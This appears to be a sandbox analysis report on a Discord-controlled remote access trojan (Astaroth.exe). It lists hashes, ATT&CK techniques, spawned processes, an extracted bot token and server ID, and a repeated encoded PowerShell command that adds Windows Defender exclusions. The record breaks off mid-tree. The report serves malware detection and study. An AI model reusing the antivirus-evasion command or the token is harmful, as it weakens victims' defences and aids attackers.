discordrat | 893092b2ad575827e3e4141319c95e950a8cf603a2327463c58589c98a2f199d

Analysis

max time kernel
1s
max time network
51s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
16-06-2024 02:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Astaroth.exe
Size

1.1MB
MD5

5c0aaf1abfda3b4117ee04be8fc1dff4
SHA1

0db1cf8169b9ccbe724bf9c6072fe4330fb86c93
SHA256

893092b2ad575827e3e4141319c95e950a8cf603a2327463c58589c98a2f199d
SHA512

296a080c01c466bbe1e19dc8011adc571d6303e86e4febc5c0651e778899b8c568e4f14fcc22ce18aee05da365b757a20c8e49c645e06ffd2d4ff3c2dda42c1d
SSDEEP

24576:ypbeS0CdSq66yiuhu6RShqGvig4tuF27yFd+eALJUFybP//EC:oZdi6y/o6cMWigKu8+3xoJg0P//EC

Score

10^/10

discordrat execution persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTIwMDEzMzQ2NjQ0NTA3NDQ2Mg.GwEY-h.xAAZqHsH5z5QtSAGots9JOAIzSw7sk1O21UHWo
server_id
1202585987616735312

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Executes dropped EXE 4 IoCs

pid	Process
5004	system.exe
2988	system.exe
1020	system.exe
3336	system.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 24 IoCs

Web Service

T1102

flow	ioc
45	discord.com
64	discord.com
8	discord.com
21	discord.com
44	discord.com
61	discord.com
75	discord.com
7	discord.com
11	discord.com
13	discord.com
18	discord.com
26	discord.com
29	discord.com
33	discord.com
41	discord.com
54	discord.com
84	discord.com
1	discord.com
37	discord.com
47	discord.com
51	discord.com
71	discord.com
81	discord.com
91	discord.com

Command and Scripting Interpreter: PowerShell 1 TTPs 58 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5932	powershell.exe
8816	powershell.exe
6152	powershell.exe
4808	powershell.exe
11056	powershell.exe
5284	powershell.exe
2556	powershell.exe
7684	powershell.exe
7896	powershell.exe
3368	powershell.exe
1560	powershell.exe
8552	powershell.exe
10008	powershell.exe
5264	powershell.exe
8184	powershell.exe
10420	powershell.exe
3100	powershell.exe
6968	powershell.exe
6184	powershell.exe
9572	powershell.exe
1888	powershell.exe
4968	powershell.exe
2576	powershell.exe
9736	powershell.exe
5768	powershell.exe
8368	powershell.exe
8628	powershell.exe
8044	powershell.exe
7424	powershell.exe
8684	powershell.exe
10216	powershell.exe
1116	powershell.exe
5588	powershell.exe
5920	powershell.exe
7368	powershell.exe
6128	powershell.exe
4956	powershell.exe
2480	powershell.exe
10304	powershell.exe
8036	powershell.exe
7488	powershell.exe
2232	powershell.exe
3416	powershell.exe
6460	powershell.exe
8920	powershell.exe
6864	powershell.exe
5736	powershell.exe
7784	powershell.exe
5696	powershell.exe
10756	powershell.exe
6592	powershell.exe
6652	powershell.exe
2416	powershell.exe
6568	powershell.exe
8780	powershell.exe
9424	powershell.exe
5096	powershell.exe
9032	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2416	powershell.exe
4956	powershell.exe
2232	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	5004	system.exe
Token: SeDebugPrivilege	2988	system.exe
Token: SeDebugPrivilege	1020	system.exe
Token: SeDebugPrivilege	2416	powershell.exe
Token: SeDebugPrivilege	4956	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	3336	system.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 4992 wrote to memory of 2416	4992	Astaroth.exe	80
PID 4992 wrote to memory of 2416	4992	Astaroth.exe	80
PID 4992 wrote to memory of 2416	4992	Astaroth.exe	80
PID 4992 wrote to memory of 5004	4992	Astaroth.exe	82
PID 4992 wrote to memory of 5004	4992	Astaroth.exe	82
PID 4992 wrote to memory of 3584	4992	Astaroth.exe	83
PID 4992 wrote to memory of 3584	4992	Astaroth.exe	83
PID 4992 wrote to memory of 3584	4992	Astaroth.exe	83
PID 3584 wrote to memory of 4956	3584	Astaroth.exe	84
PID 3584 wrote to memory of 4956	3584	Astaroth.exe	84
PID 3584 wrote to memory of 4956	3584	Astaroth.exe	84
PID 3584 wrote to memory of 2988	3584	Astaroth.exe	86
PID 3584 wrote to memory of 2988	3584	Astaroth.exe	86
PID 3584 wrote to memory of 3712	3584	Astaroth.exe	87
PID 3584 wrote to memory of 3712	3584	Astaroth.exe	87
PID 3584 wrote to memory of 3712	3584	Astaroth.exe	87
PID 3712 wrote to memory of 2232	3712	Astaroth.exe	88
PID 3712 wrote to memory of 2232	3712	Astaroth.exe	88
PID 3712 wrote to memory of 2232	3712	Astaroth.exe	88
PID 3712 wrote to memory of 1020	3712	Astaroth.exe	90
PID 3712 wrote to memory of 1020	3712	Astaroth.exe	90
PID 3712 wrote to memory of 5016	3712	Astaroth.exe	109
PID 3712 wrote to memory of 5016	3712	Astaroth.exe	109
PID 3712 wrote to memory of 5016	3712	Astaroth.exe	109
PID 5016 wrote to memory of 3416	5016	Astaroth.exe	92
PID 5016 wrote to memory of 3416	5016	Astaroth.exe	92
PID 5016 wrote to memory of 3416	5016	Astaroth.exe	92
PID 5016 wrote to memory of 3336	5016	Astaroth.exe	94
PID 5016 wrote to memory of 3336	5016	Astaroth.exe	94
PID 5016 wrote to memory of 2952	5016	Astaroth.exe	110
PID 5016 wrote to memory of 2952	5016	Astaroth.exe	110
PID 5016 wrote to memory of 2952	5016	Astaroth.exe	110

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4992
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2416
- C:\Users\Admin\AppData\Local\Temp\system.exe
  "C:\Users\Admin\AppData\Local\Temp\system.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5004
- C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
  "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4956
- - C:\Users\Admin\AppData\Local\Temp\system.exe
    "C:\Users\Admin\AppData\Local\Temp\system.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2988
- - C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
    "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3712
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2232
  - - C:\Users\Admin\AppData\Local\Temp\system.exe
      "C:\Users\Admin\AppData\Local\Temp\system.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1020
  - - C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
      "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5016
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3416
    - - C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3336
    - - C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        5⤵
        
        PID:2952
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1888
      - C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        6⤵
        
        PID:4828
      - C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        6⤵
        
        PID:2012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        7⤵
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        7⤵
        
        PID:2904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        8⤵
        
        PID:2756
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        8⤵
        
        PID:4868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2556
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        9⤵
        
        PID:2952
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        9⤵
        
        PID:3724
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2576
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        10⤵
        
        PID:1980
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        10⤵
        
        PID:3636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        11⤵
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        11⤵
        
        PID:5280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5588
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        12⤵
        
        PID:5612
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        12⤵
        
        PID:5620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5920
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        13⤵
        
        PID:5964
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        13⤵
        
        PID:5972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1560
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        14⤵
        
        PID:5136
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        14⤵
        
        PID:5368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2480
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        15⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        15⤵
        
        PID:3636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6184
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        16⤵
        
        PID:6232
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        16⤵
        
        PID:6244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6460
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        17⤵
        
        PID:6516
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        17⤵
        
        PID:6524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6864
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        18⤵
        
        PID:6908
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        18⤵
        
        PID:6920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5768
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        19⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        19⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6568
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        20⤵
        
        PID:6644
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        20⤵
        
        PID:6428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5736
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        21⤵
        
        PID:7100
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        21⤵
        
        PID:7108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5932
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        22⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        22⤵
        
        PID:6252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
